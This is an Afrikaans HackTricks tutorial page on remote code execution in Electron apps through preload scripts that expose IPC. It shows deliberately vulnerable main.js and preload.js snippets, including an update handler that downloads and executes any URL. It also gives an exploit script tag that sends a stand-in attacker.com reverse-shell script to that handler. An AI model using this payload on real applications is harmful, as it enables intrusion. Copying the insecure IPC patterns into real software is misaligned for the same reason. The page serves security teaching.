Electron contextIsolation RCE via IPC

Reading time: 3 minutes

tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

As die preload-skrip 'n IPC-eindpunt van die main.js-lêer blootstel, sal die renderer-proses toegang daartoe hê en, indien kwesbaar, kan 'n RCE moontlik wees.

Die meeste van hierdie voorbeelde is hier geneem https://www.youtube.com/watch?v=xILfQGkLXQo. Kyk na die video vir verdere inligting.

Voorbeeld 0

Voorbeeld van https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21 (jy het die volle voorbeeld van hoe MS Teams XSS tot RCE misbruik het in daardie skyfies, dit is net 'n baie basiese voorbeeld):

Voorbeeld 1

Kyk hoe die main.js luister op getUpdate en sal enige URL wat gegee word aflaai en uitvoer.
Kyk ook hoe preload.js enige IPC gebeurtenis van die hoof blootstel.

javascript
// Part of code of main.js
ipcMain.on("getUpdate", (event, url) => {
console.log("getUpdate: " + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
})

mainWindow.webContents.session.on(
"will-download",
(event, item, webContents) => {
console.log("downloads path=" + app.getPath("downloads"))
console.log("mainWindow.download_url=" + mainWindow.download_url)
url_parts = mainWindow.download_url.split("/")
filename = url_parts[url_parts.length - 1]
mainWindow.downloadPath = app.getPath("downloads") + "/" + filename
console.log("downloadPath=" + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)

item.on("updated", (event, state) => {
if (state === "interrupted") {
console.log("Download is interrupted but can be resumed")
} else if (state === "progressing") {
if (item.isPaused()) console.log("Download is paused")
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})

item.once("done", (event, state) => {
if (state === "completed") {
console.log("Download successful, running update")
fs.chmodSync(mainWindow.downloadPath, 0755)
var child = require("child_process").execFile
child(mainWindow.downloadPath, function (err, data) {
if (err) {
console.error(err)
return
}
console.log(data.toString())
})
} else console.log(`Download failed: ${state}`)
})
}
)
javascript
// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data)
}

Eksploiteer:

html
<script>
electronSend("getUpdate", "https://attacker.com/path/to/revshell.sh")
</script>

Voorbeeld 2

As die preload-skrip direk aan die renderer 'n manier bied om shell.openExternal aan te roep, is dit moontlik om RCE te verkry.

javascript
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url)
}

Voorbeeld 3

As die preload-skrip maniere blootstel om heeltemal met die hoofproses te kommunikeer, sal 'n XSS in staat wees om enige gebeurtenis te stuur. Die impak hiervan hang af van wat die hoofproses blootstel in terme van IPC.

javascript
window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb)
}

window.electronSend = (event, data) => {
ipcRenderer.send(event, data)
}

tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks